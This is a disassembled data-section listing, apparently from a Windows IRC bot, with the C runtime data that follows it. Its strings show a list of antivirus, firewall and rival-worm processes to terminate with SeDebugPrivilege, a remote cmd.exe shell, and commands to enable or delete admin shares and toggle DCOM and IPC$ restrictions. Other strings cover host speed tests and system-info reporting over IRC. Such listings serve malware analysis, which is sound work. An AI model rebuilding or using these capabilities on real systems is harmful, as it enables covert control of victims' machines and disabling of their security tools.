aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_41A32C:loc_41A442�o
align 4
aAnUnknownErr_0 db 'An unknown error occurred.',0 ; DATA XREF: sub_41A32C:loc_41A42D�o
align 4
; char asc_450B58[]
asc_450B58 db '-' ; DATA XREF: sub_41A460+81�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aMessageSentSuc db '- message sent successfully',0
align 10h
; char asc_450B80[]
asc_450B80 db '-' ; DATA XREF: sub_41A460+AB�o
db 3, 34h, 2
dd 274656Eh, 25202D03h, 34032073h, 76726553h, 3A037265h
dd 20532520h, 654D3403h, 67617373h, 203A0365h, 5325h
dword_450BAC dd 7530h ; DATA XREF: sub_41A8E1+12�r
off_450BB0 dd offset aRegedit_exe ; DATA XREF: sub_41A589+CB�o
; "regedit.exe"
dd offset aMsconfig_exe ; "msconfig.exe"
dd offset aNetstat_exe ; "netstat.exe"
dd offset aMsblast_exe ; "msblast.exe"
dd offset aZapro_exe ; "zapro.exe"
dd offset aNavw32_exe ; "navw32.exe"
dd offset aNavapw32_exe ; "navapw32.exe"
dd offset aZonealarm_exe ; "zonealarm.exe"
dd offset aWincfg32_exeta ; "wincfg32.exetaskmon.exe"
dd offset aPandaavengine_ ; "PandaAVEngine.exe"
dd offset aSysinfo_exe ; "sysinfo.exe"
dd offset aMscvb32_exe ; "mscvb32.exe"
dd offset aMsblast_exe_0 ; "MSBLAST.exe"
dd offset aTeekids_exe ; "teekids.exe"
dd offset aPenis32_exe ; "Penis32.exe"
dd offset aBbeagle_exe ; "bbeagle.exe"
dd offset aSysmonxp_exe ; "SysMonXP.exe"
dd offset aWinupd_exe ; "winupd.exe"
dd offset aWinsys_exe ; "winsys.exe"
dd offset aSsate_exe ; "ssate.exe"
dd offset aRate_exe ; "rate.exe"
dd offset aD3dupdate_exe ; "d3dupdate.exe"
dd offset aIrun4_exe ; "irun4.exe"
dd offset aI11r54n4_exe ; "i11r54n4.exe"
aRegedit_exe db 'regedit.exe',0 ; DATA XREF: sub_41A589+EC�o
; .data:off_450BB0�o
aMsconfig_exe db 'msconfig.exe',0 ; DATA XREF: .data:00450BB4�o
align 4
aNetstat_exe db 'netstat.exe',0 ; DATA XREF: .data:00450BB8�o
aMsblast_exe db 'msblast.exe',0 ; DATA XREF: .data:00450BBC�o
aZapro_exe db 'zapro.exe',0 ; DATA XREF: .data:00450BC0�o
align 10h
aNavw32_exe db 'navw32.exe',0 ; DATA XREF: .data:00450BC4�o
align 4
aNavapw32_exe db 'navapw32.exe',0 ; DATA XREF: .data:00450BC8�o
align 4
aZonealarm_exe db 'zonealarm.exe',0 ; DATA XREF: .data:00450BCC�o
align 4
aWincfg32_exeta db 'wincfg32.exetaskmon.exe',0 ; DATA XREF: .data:00450BD0�o
aPandaavengine_ db 'PandaAVEngine.exe',0 ; DATA XREF: .data:00450BD4�o
align 4
aSysinfo_exe db 'sysinfo.exe',0 ; DATA XREF: .data:00450BD8�o
aMscvb32_exe db 'mscvb32.exe',0 ; DATA XREF: .data:00450BDC�o
aMsblast_exe_0 db 'MSBLAST.exe',0 ; DATA XREF: .data:00450BE0�o
aTeekids_exe db 'teekids.exe',0 ; DATA XREF: .data:00450BE4�o
aPenis32_exe db 'Penis32.exe',0 ; DATA XREF: .data:00450BE8�o
aBbeagle_exe db 'bbeagle.exe',0 ; DATA XREF: .data:00450BEC�o
aSysmonxp_exe db 'SysMonXP.exe',0 ; DATA XREF: .data:00450BF0�o
align 10h
aWinupd_exe db 'winupd.exe',0 ; DATA XREF: .data:00450BF4�o
align 4
aWinsys_exe db 'winsys.exe',0 ; DATA XREF: .data:00450BF8�o
align 4
aSsate_exe db 'ssate.exe',0 ; DATA XREF: .data:00450BFC�o
align 4
aRate_exe db 'rate.exe',0 ; DATA XREF: .data:00450C00�o
align 10h
aD3dupdate_exe db 'd3dupdate.exe',0 ; DATA XREF: .data:00450C04�o
align 10h
aIrun4_exe db 'irun4.exe',0 ; DATA XREF: .data:00450C08�o
align 4
aI11r54n4_exe db 'i11r54n4.exe',0 ; DATA XREF: .data:00450C0C�o
align 4
aSedebugprivi_1 db 'SeDebugPrivilege',0 ; DATA XREF: sub_41A589+5A�o
align 10h
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_41A589+17D�o
align 4
aSD_1 db ' %s (%d)',0 ; DATA XREF: sub_41A589+18B�o
align 4
; char aSD_2[]
aSD_2 db ' %s (%d)',0 ; DATA XREF: sub_41A589+19F�o
align 4
aSedebugprivi_2 db 'SeDebugPrivilege',0 ; DATA XREF: sub_41A589+207�o
align 4
; char asc_450DA8[]
asc_450DA8 db '-' ; DATA XREF: sub_41A7CC+19�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aListingProcess db ' listing processes:',0
unk_450DC8 db 2Dh ; - ; DATA XREF: sub_41A7CC+80�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessListCom db ' process list complete',0
align 4
; char asc_450DEC[]
asc_450DEC db '-' ; DATA XREF: sub_41A7CC:loc_41A853�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessListFai db ' process list failed',0
align 10h
; char aPrivmsgSS_4[]
aPrivmsgSS_4 db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_41A969+33�o
; char aS_31[]
aS_31 db '%s',0 ; DATA XREF: sub_41A969+4C�o
align 4
unk_450E24 db 2Dh ; - ; DATA XREF: sub_41A9F0:loc_41AAD6�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldNotReadDa db '- Could not read data from proccess',0Dh,0Ah,0
align 4
unk_450E54 db 2Dh ; - ; DATA XREF: sub_41A9F0+10F�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aProccessHasTer db '- Proccess has terminated.',0Dh,0Ah,0
align 4
unk_450E7C db 2Dh ; - ; DATA XREF: sub_41A9F0:loc_41AB22�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldNotRead_0 db '- Could not read data from proccess.',0Dh,0Ah,0
aCmd_exe_0 db 'cmd.exe',0 ; DATA XREF: sub_41AB45+20�o
; char asc_450EB4[]
asc_450EB4 db '-' ; DATA XREF: sub_41AB45+150�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteCommandP db '- Remote Command Prompt',0
align 4
; char asc_450ED8[]
asc_450ED8 db '-' ; DATA XREF: sub_41AB45+198�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aFailedToStartI db '- Failed to start IO thread, error: <%d>.',0
align 10h
off_450F10 dd offset aIpc ; DATA XREF: sub_41AD5D+1B3�o
; sub_41B081+179�o
; "IPC$"
align 8
dd offset aAdmin_1 ; "ADMIN$"
align 10h
off_450F20 dd offset aC_5 ; DATA XREF: sub_41B081+1E1�o
; "C$"
dd offset aC_6 ; "C:\\"
dd offset aD_3 ; "D$"
dd offset aD_4 ; "D:\\"
aIpc db 'IPC$',0 ; DATA XREF: sub_41AD5D+217�o
; .data:off_450F10�o
align 4
aAdmin_1 db 'ADMIN$',0 ; DATA XREF: .data:00450F18�o
align 10h
aC_5 db 'C$',0 ; DATA XREF: .data:off_450F20�o
align 4
aC_6 db 'C:\',0 ; DATA XREF: .data:00450F24�o
aD_3 db 'D$',0 ; DATA XREF: .data:00450F28�o
align 4
aD_4 db 'D:\',0 ; DATA XREF: .data:00450F2C�o
word_450F50 dw 4Eh ; DATA XREF: sub_41AD5D+38�r
align 4
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_41AD5D+54�o
align 10h
dword_450F60 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AD5D+66�o
aDisableDcomFai db '- Disable DCOM failed.',0
align 4
; char asc_450F84[]
asc_450F84 db '-' ; DATA XREF: sub_41AD5D:loc_41ADCA�o
db 3, 34h, 2
dd 75636573h, 3026572h, 4344202Dh, 64204D4Fh, 62617369h
dd 2E64656Ch, 0
; char asc_450FA4[]
asc_450FA4 db '-' ; DATA XREF: sub_41AD5D+91�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToOpenDc db '- Failed to open DCOM registry key.',0
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_41AD5D+ED�o
align 4
dword_450FE8 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AD5D+106�o
aFailedToRestri db '- Failed to restrict access to the IPC$ Share.',0
align 4
; char asc_451024[]
asc_451024 db '-' ; DATA XREF: sub_41AD5D:loc_41AE6A�o
db 3, 34h, 2
dd 75636573h, 3026572h
aRestrictedAcce db '- Restricted access to the IPC$ Share.',0
align 4
dword_451058 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AD5D:loc_41AE88�o
aFailedToOpenIp db '- Failed to open IPC$ Restriction registry key.',0
; char asc_451094[]
asc_451094 db '-' ; DATA XREF: sub_41AD5D:loc_41AE8F�o
db 3, 34h, 2
dd 75636573h, 3026572h
aAdvapi32_dllCo db '- Advapi32.dll couldn',27h,'t be loaded.',0
align 4
dword_4510C4 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AD5D+25B�o
aShareSDeleted_ db '- Share ',27h,'%S',27h,' deleted.',0
align 4
; char asc_4510E8[]
asc_4510E8 db '-' ; DATA XREF: sub_41AD5D:loc_41AFBF�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToDelete db '- Failed to delete ',27h,'%S',27h,' share.',0
align 4
dword_451114 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AD5D+1C8�o
aShareSDelete_0 db '- Share ',27h,'%s',27h,' deleted.',0
align 4
; char asc_451138[]
asc_451138 db '-' ; DATA XREF: sub_41AD5D:loc_41AF2C�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToDele_0 db '- Failed to delete ',27h,'%s',27h,' share.',0
align 4
; char asc_451164[]
asc_451164 db '-' ; DATA XREF: sub_41AD5D+2CF�o
db 3, 34h, 2
dd 75636573h, 3026572h
aNetworkSharesD db '- Network shares deleted.',0
align 4
; char asc_45118C[]
asc_45118C db '-' ; DATA XREF: sub_41AD5D+2E5�o
db 3, 34h, 2
dd 75636573h, 3026572h
aNetapi32_dllCo db '- Netapi32.dll couldn',27h,'t be loaded.',0
align 4
word_4511BC dw 59h ; DATA XREF: sub_41B081+38�r
align 10h
aEnabledcom_0 db 'EnableDCOM',0 ; DATA XREF: sub_41B081+54�o
align 4
dword_4511CC dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41B081+66�o
aEnableDcomFail db '- Enable DCOM failed.',0
align 10h
; char asc_4511F0[]
asc_4511F0 db '-' ; DATA XREF: sub_41B081:loc_41B0EE�o
db 3, 34h, 2
dd 75636573h, 3026572h, 4344202Dh, 65204D4Fh, 6C62616Eh
dd 2E6465h
; char asc_45120C[]
asc_45120C db '-' ; DATA XREF: sub_41B081+91�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToOpen_1 db '- Failed to open DCOM registry key.',0
aRestrictanon_0 db 'restrictanonymous',0 ; DATA XREF: sub_41B081+ED�o
align 10h
dword_451250 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41B081+102�o
aFailedToUnrest db '- Failed to unrestrict access to the IPC$ Share.',0
align 10h
; char asc_451290[]
asc_451290 db '-' ; DATA XREF: sub_41B081:loc_41B18A�o
db 3, 34h, 2
dd 75636573h, 3026572h
aUnrestrictedAc db '- Unrestricted access to the IPC$ Share.',0
align 4
dword_4512C8 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41B081:loc_41B1A8�o
aFailedToOpen_2 db '- Failed to open IPC$ restriction registry key.',0
; char asc_451304[]
asc_451304 db '-' ; DATA XREF: sub_41B081:loc_41B1AF�o
db 3, 34h, 2
dd 75636573h, 3026572h
aAdvapi32_dll_0 db '- Advapi32.dll couldn',27h,'t be loaded.',0
align 4
dword_451334 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41B081+192�o
aShareSAdded_ db '- Share ',27h,'%s',27h,' added.',0
; char asc_451354[]
asc_451354 db '-' ; DATA XREF: sub_41B081:loc_41B21A�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToAddSSh db '- Failed to add ',27h,'%s',27h,' share.',0
; char aC_1[]
aC_1 db '%c$',0 ; DATA XREF: sub_41B081+216�o
; char aC_0[]
aC_0 db '%c:\',0 ; DATA XREF: sub_41B081+22D�o
align 4
dword_451388 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41B081+266�o
aShareSAdded__0 db '- Share ',27h,'%s',27h,' added.',0
; char asc_4513A8[]
asc_4513A8 db '-' ; DATA XREF: sub_41B081:loc_41B2EE�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToAddS_0 db '- Failed to add ',27h,'%s',27h,' share.',0
; char asc_4513D0[]
asc_4513D0 db '-' ; DATA XREF: sub_41B081+2C3�o
db 3, 34h, 2
dd 75636573h, 3026572h
aNetworkSharesA db '- Network shares added.',0
; char asc_4513F4[]
asc_4513F4 db '-' ; DATA XREF: sub_41B081+2DB�o
db 3, 34h, 2
dd 75636573h, 3026572h
aNetapi32_dll_1 db '- Netapi32.dll couldn',27h,'t be loaded.',0
align 4
; char aPostHttp1_0Hos[]
aPostHttp1_0Hos db 'POST / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_41B3B5+E1�o
db 'Host: %s',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 0Dh,0Ah,0
align 4
; char asc_451458[]
asc_451458 db 0Dh,0Ah,0 ; DATA XREF: sub_41B3B5+F5�o
align 4
aWww_schlund_ne db 'www.schlund.net',0 ; DATA XREF: sub_41B592+15�o
aWww_utwente_nl db 'www.utwente.nl',0 ; DATA XREF: sub_41B592+1C�o
align 4
aVerio_fr db 'verio.fr',0 ; DATA XREF: sub_41B592+23�o
align 4
aWww_1und1_de db 'www.1und1.de',0 ; DATA XREF: sub_41B592+2A�o
align 4
aWww_switch_ch db 'www.switch.ch',0 ; DATA XREF: sub_41B592+31�o
align 4
aWww_belwue_de db 'www.belwue.de',0 ; DATA XREF: sub_41B592+38�o
align 4
aDe_yahoo_com db 'de.yahoo.com',0 ; DATA XREF: sub_41B592+3F�o
align 4
aWww_google_it db 'www.google.it',0 ; DATA XREF: sub_41B592+46�o
align 4
aWww_xo_net db 'www.xo.net',0 ; DATA XREF: sub_41B592+4D�o
align 4
aWww_stanford_e db 'www.stanford.edu',0 ; DATA XREF: sub_41B592+54�o
align 4
aWww_verio_com db 'www.verio.com',0 ; DATA XREF: sub_41B592+5B�o
align 4
aWww_nocster_co db 'www.nocster.com',0 ; DATA XREF: sub_41B592+62�o
aWww_rit_edu db 'www.rit.edu',0 ; DATA XREF: sub_41B592+69�o
aWww_cogentco_c db 'www.cogentco.com',0 ; DATA XREF: sub_41B592+70�o
align 4
aWww_burst_net db 'www.burst.net',0 ; DATA XREF: sub_41B592+77�o
align 4
aNitro_ucsc_edu db 'nitro.ucsc.edu',0 ; DATA XREF: sub_41B592+7E�o
align 4
aWww_level3_com db 'www.level3.com',0 ; DATA XREF: sub_41B592+85�o
align 4
aWww_above_net db 'www.above.net',0 ; DATA XREF: sub_41B592+8C�o
align 4
aWww_easynews_c db 'www.easynews.com',0 ; DATA XREF: sub_41B592+93�o
align 4
aWww_google_com db 'www.google.com',0 ; DATA XREF: sub_41B592+9A�o
align 4
aWww_lib_nthu_e db 'www.lib.nthu.edu.tw',0 ; DATA XREF: sub_41B592+A1�o
aWww_st_lib_kei db 'www.st.lib.keio.ac.jp',0 ; DATA XREF: sub_41B592+A8�o
align 4
aWww_d1asia_com db 'www.d1asia.com',0 ; DATA XREF: sub_41B592+AF�o
align 4
aWww_nifty_com db 'www.nifty.com',0 ; DATA XREF: sub_41B592+B6�o
align 4
aYahoo_co_jp db 'yahoo.co.jp',0 ; DATA XREF: sub_41B592+BD�o
aWww_google_co_ db 'www.google.co.jp',0 ; DATA XREF: sub_41B592+C4�o
align 4
; char asc_451608[]
asc_451608 db '-' ; DATA XREF: sub_41B592+1A7�o
db 3, 34h, 2
dd 65657073h, 73657464h, 2D030274h, 75450220h, 65706F72h
dd 25203A02h, 626B2064h, 732F7469h, 53550220h, 203A0241h
dd 6B206425h, 2F746962h, 41022073h, 2616973h, 6425203Ah
dd 69626B20h, 20732F74h, 65764102h, 65676172h, 25203A02h
dd 626B2064h, 732F7469h, 0
; char aDdDhDm[]
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_41B76F+52�o
a95_0 db '95',0 ; DATA XREF: sub_41B92C+46�o
align 4
aNt_0 db 'NT',0 ; DATA XREF: sub_41B92C+5A�o
align 4
a98_0 db '98',0 ; DATA XREF: sub_41B92C+6C�o
align 10h
aMe_1 db 'ME',0 ; DATA XREF: sub_41B92C+7E�o
align 4
a2k_0 db '2K',0 ; DATA XREF: sub_41B92C+98�o
align 4
aXp_0 db 'XP',0 ; DATA XREF: sub_41B92C+AA�o
align 4
a2003 db '2003',0 ; DATA XREF: sub_41B92C+BA�o
align 4
a???_0 db '???',0 ; DATA XREF: sub_41B92C:loc_41B9EF�o
; char aSS_12[]
aSS_12 db '%s (%s)',0 ; DATA XREF: sub_41B92C+EB�o
word_4516A0 dw 3Fh ; DATA XREF: sub_41B92C:loc_41BA2E�r
align 4
; char aCouldnTResolve[]
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_41B92C:loc_41BA90�o
align 4
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_41B92C+192�o
aHhMmSs_0 db 'HH:mm:ss',0 ; DATA XREF: sub_41B92C+1AE�o
align 4
; char asc_4516D4[]
asc_4516D4 db '-' ; DATA XREF: sub_41B92C+297�o
db 3, 34h, 2
dd 69737973h, 26F666Eh, 2202D03h, 2555043h, 4925203Ah
dd 4D753436h, 202E7A48h, 4D415202h, 25203A02h, 20424B73h
dd 61746F74h, 25202C6Ch, 20424B73h, 65657266h, 4402202Eh
dd 26B7369h, 7325203Ah, 746F7420h, 202C6C61h, 66207325h
dd 2E656572h, 534F0220h, 57203A02h, 6F646E69h, 25207377h
dd 25282073h, 64252E64h, 7542202Ch, 20646C69h, 2E296425h
dd 79530220h, 72696473h, 25203A02h, 2202E73h, 74736F48h
dd 656D616Eh, 25203A02h, 25282073h, 202E2973h, 72754302h
dd 746E6572h, 65735520h, 203A0272h, 202E7325h, 74614402h
dd 203A0265h, 202E7325h, 6D695402h, 203A0265h, 202E7325h
dd 74705502h, 2656D69h, 7325203Ah, 2Eh
; char aNotConnected[]
aNotConnected db 'Not connected',0 ; DATA XREF: sub_41BBE0+48�o
align 10h
aDialUp db 'Dial-up',0 ; DATA XREF: sub_41BBE0+5B�o
off_4517C8 dd offset dword_4E414C ; DATA XREF: sub_41BBE0:loc_41BC42�o
; char aNA[]
aNA db 'N/A',0 ; DATA XREF: sub_41BBE0+6F�o
; char aNA_0[]
aNA_0 db 'N/A',0 ; DATA XREF: sub_41BBE0+82�o
; char asc_4517D4[]
asc_4517D4 db '-' ; DATA XREF: sub_41BBE0+A7�o
db 3, 34h, 2
dd 6974656Eh, 26F666Eh, 2202D03h, 65707954h, 25203A02h
dd 25282073h, 202E2973h, 20504902h, 72646441h, 2737365h
dd 7325203Ah, 4802202Eh, 6E74736Fh, 2656D61h, 7325203Ah
dd 2Eh
dword_451818 dd 2A2F2Ah ; DATA XREF: sub_41BCA5+3B�o
; char asc_45181C[]
asc_45181C db '-' ; DATA XREF: sub_41BCA5+1A0�o
db 3, 34h, 2
dd 69736976h, 2D030274h, 766E4920h, 64696C61h, 4C525520h
dd 2Eh
unk_451838 db 2Dh ; - ; DATA XREF: sub_41BCA5:loc_41BE57�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aCouldNotOpenAC db ' Could not open a connection.',0
align 4
; char asc_451864[]
asc_451864 db '-' ; DATA XREF: sub_41BCA5:loc_41BE5E�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToConnec db ' Failed to connect to HTTP server.',0
align 4
dword_451894 dd 234032Dh, 69736976h, 2D030274h, 4C525520h, 73697620h
; DATA XREF: sub_41BCA5+18C�o
dd 64657469h, 2Eh
unk_4518B0 db 2Dh ; - ; DATA XREF: sub_41BCA5:loc_41BE38�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToGetReq db ' Failed to get requested URL from HTTP server.',0
align 10h
dword_4518F0 dd 1 ; DATA XREF: __heap_alloc_dbg+10�r
; __heap_alloc_dbg+F2�r ...
dword_4518F4 dd 25h ; DATA XREF: __heap_alloc_dbg:loc_41C22C�r
; __heap_alloc_dbg:loc_41C395�r ...
dword_4518F8 dd 0FFFFFFFFh ; DATA XREF: __heap_alloc_dbg+58�r
; _realloc_help+9E�r ...
byte_4518FC db 0FDh ; DATA XREF: __heap_alloc_dbg+2B7�r
; __heap_alloc_dbg+2D1�r ...
byte_4518FD db 0DDh ; DATA XREF: sub_41CCE0+257�r
; sub_41CCE0+39B�r ...
byte_4518FE db 0CDh ; DATA XREF: __heap_alloc_dbg+2F1�r
; _realloc_help+377�r
align 10h
; char off_451900[]
off_451900 dd offset aFree ; DATA XREF: sub_41CCE0+177�r
; sub_41CCE0+1DD�r ...
; "Free"
dd offset aNormal_0 ; "Normal"
dd offset aCrt ; "CRT"
dd offset aIgnore ; "Ignore"
dd offset aClient ; "Client"
align 10h
dword_451920 dd 173Fh ; DATA XREF: _floor+B�r
dd 9875h, 9873h
off_45192C dd offset __fpmath ; DATA XREF: __cinit+3�r __cinit+C�r
dd offset __initp_misc_winxfltr
dd offset __initp_misc_winxfltr
dword_451938 dd 1B3Fh ; DATA XREF: _ceil+B�r
dword_45193C dd 19930520h, 4 dup(0) ; DATA XREF: __NLG_Notify1+2�o
; __NLG_Notify+2�o
off_451950 dd offset __exit ; DATA XREF: __amsg_exit+22�r
dword_451954 dd 2 ; DATA XREF: __FF_MSGBANNER+15�r
; __NMSG_WRITE+86�r ...
off_451958 dd offset dword_4F3C20 ; DATA XREF: ___initstdio+B3�o
; __lock_file+3�o ...
align 10h
dd offset dword_4F3C20
dd 101h
dword_451968 dd 0FFFFFFFFh ; DATA XREF: ___initstdio+11C�w
dd 0
dd 1000h, 0
dword_451978 dd 3 dup(0) ; DATA XREF: __flsbuf+111�o
; __stbuf:loc_429F43�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_451998 dd 3 dup(0) ; DATA XREF: __flsbuf+11A�o
; __stbuf:loc_429F55�o
dd 2, 0FFFFFFFFh, 83h dup(0)
dword_451BB8 dd 8 dup(0) ; DATA XREF: __lock_file+C�o
; __unlock_file+C�o
dword_451BD8 dd 0FFFFFFFFh ; DATA XREF: __CrtDbgReport+80�o
; __CrtDbgReport+108�o ...
dword_451BDC dd 2 ; DATA XREF: __CrtSetReportMode+1E�r
; __CrtSetReportMode+39�r ...
dd 2 dup(4)
dword_451BE8 dd 0FFFFFFFFh ; DATA XREF: __CrtSetReportFile+20�r
; __CrtSetReportFile+2C�r ...
dd 2 dup(0FFFFFFFFh)
off_451BF4 dd offset aWarning ; DATA XREF: _CrtMessageWindow+284�r
; "Warning"
dd offset aError ; "Error"
dd offset aAssertionFai_1 ; "Assertion Failed"
dword_451C00 dd 0 ; DATA XREF: __mtdeletelocks+1F�r
; __mtdeletelocks+44�r ...
off_451C04 dd offset dword_4F3590 ; DATA XREF: __mtinitlocks+29�r
; __mtdeletelocks+8F�r
dd 7 dup(0)
off_451C24 dd offset dword_4F35C0 ; DATA XREF: __mtinitlocks+1C�r
; __mtdeletelocks:loc_4234A9�r
dd 3 dup(0)
off_451C34 dd offset dword_4F35D8 ; DATA XREF: __mtinitlocks+F�r
; __mtdeletelocks+75�r
dd 3 dup(0)
off_451C44 dd offset dword_4F35A8 ; DATA XREF: __mtinitlocks+3�r
; __mtdeletelocks+82�r
dd 7 dup(0)
dd 9427F8h, 16h dup(0)
off_451CC0 dd offset unknown_libname_5 ; DATA XREF: __heap_alloc_dbg+79�r
; _realloc_help+C1�r ...
; Microsoft VisualC 2-8/net runtime
align 8
off_451CC8 dd offset off_451CC8 ; DATA XREF: ___sbh_new_region+F�o
; ___sbh_new_region+7A�o ...
off_451CCC dd offset off_451CC8 ; DATA XREF: ___sbh_new_region:loc_426046�r
; ___sbh_new_region+9F�w ...
dd offset dword_451CE0
dd offset dword_451CE0
dword_451CD8 dd 0FFFFFFFFh ; DATA XREF: ___sbh_new_region+6�r
; ___sbh_release_region:loc_4261F7�w
dd 0FFFFFFFFh
dword_451CE0 dd 0F0h, 0F1h, 800h dup(0) ; DATA XREF: .data:00451CD0�o
; .data:00451CD4�o
off_453CE8 dd offset off_451CC8 ; DATA XREF: ___sbh_release_region+17�r
; ___sbh_release_region+28�w ...
dword_453CEC dd 1E0h ; DATA XREF: __heap_alloc_base+AE�r
; sub_423880+146�r ...
dd 10h
off_453CF4 dd offset __wctype+2 ; DATA XREF: __printMemBlockData+7C�r
; _atol+2D�r ...
off_453CF8 dd offset __wctype+2 ; DATA XREF: unknown_libname_28+2A4�w
; unknown_libname_28+35B�w ...
public __wctype
; const unsigned __int16 _wctype[]
__wctype dd 200000h ; DATA XREF: unknown_libname_28:loc_435031�o
; unknown_libname_28+35B�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
; size_t SrcSizeInBytes
SrcSizeInBytes dd 1 ; DATA XREF: __printMemBlockData+4E�r
; _atol:loc_41E876�r ...
byte_453F04 db 2Eh ; DATA XREF: unknown_libname_11:loc_42AF77�r
; unknown_libname_11+ED2�r ...
align 4
dword_453F08 dd 1 ; DATA XREF: ___init_numeric+169�w
; ___init_numeric+296�w
off_453F0C dd offset aNull ; DATA XREF: unknown_libname_7:loc_428602�r
; unknown_libname_7+57C�r
; "(null)"
off_453F10 dd offset aNull_0 ; DATA XREF: unknown_libname_7+514�r
; "(null)"
dword_453F14 dd 2 ; DATA XREF: __mtinit+F�w __mtinit+14�r ...
byte_453F18 db 1 ; DATA XREF: __setmbcp+12F�r
db 2, 4, 8
align 10h
dword_453F20 dd 3A4h ; DATA XREF: __setmbcp+7E�r
word_453F24 dw 8260h ; DATA XREF: __setmbcp+192�r
dw 8279h
dd 21h, 0
dword_453F30 dd 0DFA6h ; DATA XREF: __setmbcp+D5�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_454010 dd 1 ; DATA XREF: __dosmaperr+2C�r
dword_454014 dd 16h ; DATA XREF: __dosmaperr+3D�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
asc_454178 db ' ',9,'-',0Dh,']',0 ; DATA XREF: unknown_libname_11:loc_42A512�o
align 10h
asc_454180: ; DATA XREF: unknown_libname_11:loc_42A4ED�o
unicode 0, <]>,0
align 8
dword_454188 dd 14h ; DATA XREF: __get_fname+1F�r
off_45418C dd offset aExp ; DATA XREF: __get_fname+2E�r
; "exp"
dd 1Dh
dd offset aPow ; "pow"
dd 1Ah
dd offset aLog_0 ; "log"
dd 1Bh
dd offset aLog10 ; "log10"
dd 1Fh
dd offset aSinh ; "sinh"
dd 13h
dd offset aCosh ; "cosh"
dd 21h
dd offset aTanh ; "tanh"
dd 0Eh
dd offset aAsin ; "asin"
dd 0Dh
dd offset aAcos ; "acos"
dd 0Fh
dd offset aAtan ; "atan"
dd 10h
dd offset aAtan2 ; "atan2"
dd 5
dd offset aSqrt ; "sqrt"
dd 1Eh
dd offset aSin ; "sin"
dd 12h
dd offset aCos ; "cos"
dd 20h
dd offset aTan ; "tan"
dd 0Ch
dd offset aCeil ; "ceil"
dd 0Bh
dd offset aFloor ; "floor"
dd 15h
dd offset aFabs ; "fabs"
dd 1Ch
dd offset aModf ; "modf"
dd 19h
dd offset aLdexp ; "ldexp"
dd 11h
dd offset a_cabs ; "_cabs"
